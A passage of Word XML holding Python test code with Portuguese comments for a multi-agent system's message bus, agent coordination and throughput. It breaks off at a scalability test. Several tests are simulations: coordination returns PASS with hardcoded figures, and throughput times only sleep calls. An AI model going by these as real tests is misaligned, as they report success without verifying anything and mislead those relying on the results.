    <w:p w14:paraId="5340BD63" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE5355" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular envio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBFD1F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            message_bus.send_message(test_message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E62AAC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FFE8B1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Verificar se mensagem foi processada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348EB0D5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            await asyncio.sleep(0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122AFBF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD2076" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1492FBD4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D3A6E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B65F7C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="message_bus_communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0679C5AF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A16F71" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D039D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C07567" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "message_sent": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2964C251" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "message_id": test_message.id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197F655C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "latency_ms": duration * 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47603C49" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F58965" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4CF77" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B7F805" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B2D851" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821890B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3993613C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6606068C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="message_bus_communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10361B34" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE546A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB914AA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A9367" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D5A180" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA15F20" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CB2E3B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB984F2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_agent_coordination(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E06E3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa coordenação entre múltiplos agentes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CB1D89" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69390056" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACECEEA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE4C185" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular coordenação de agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0F557" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            coordination_data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3530E558" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "agents_created": 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB3989" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "coordination_time": 0.05,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B0B13" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "conflicts_resolved": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C248442" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "load_balanced": True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF2C631" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA4D6C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6368F961" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D33F393" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D143979" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEDC673" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="agent_coordination",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE30E69" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AC8385" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E7A0F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details=coordination_data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD44EC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA09C6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1545A3F5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAFBC3B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4EF30" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8D069" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C905364" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="agent_coordination",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DBF7ED" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC2F559" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B1E4B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D5D73F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF67FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04349E5E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC26A1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="7452EE50" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class PerformanceTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D6EC5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Testa performance e escalabilidade"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF5136" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B4FB2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D39A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49499B47" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D6C3F1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_throughput(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527C386" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa throughput do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1184D6C1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F7352" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2767D606" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558A77B9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Simular teste de throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1FE25A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            messages_per_second = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B70FC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A48AB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            for i in range(10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7288C9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                start_batch = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF6577D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8759C3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Simular processamento de 100 mensagens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B515A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                await asyncio.sleep(0.01)  # Simular processamento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BCB66D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AF2712" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                batch_duration = time.time() - start_batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747AD593" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                batch_throughput = 100 / batch_duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27604D42" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                messages_per_second.append(batch_throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3480A356" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4606E339" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            avg_throughput = statistics.mean(messages_per_second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1147D867" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            max_throughput = max(messages_per_second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C45A0F7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            min_throughput = min(messages_per_second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CEA63" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F8BCD1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66708A7F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E0B8C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8DB26F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="throughput_test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5303051E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E843F7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A841C12" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935A101" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "avg_messages_per_second": avg_throughput,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E5B43" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "max_messages_per_second": max_throughput,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AFE025" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "min_messages_per_second": min_throughput,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B36DE3C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "total_batches": len(messages_per_second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F861C4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCB57FF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFBA986" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA37C5C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E68081" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCBFB6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB383B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D08162" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="throughput_test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A006325" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE8546A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB3568" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523CBAE2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA63B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3047BD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263CD2A3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06697ACE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def test_scalability(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798DE2C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Testa escalabilidade do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8FED56" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290F4A7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
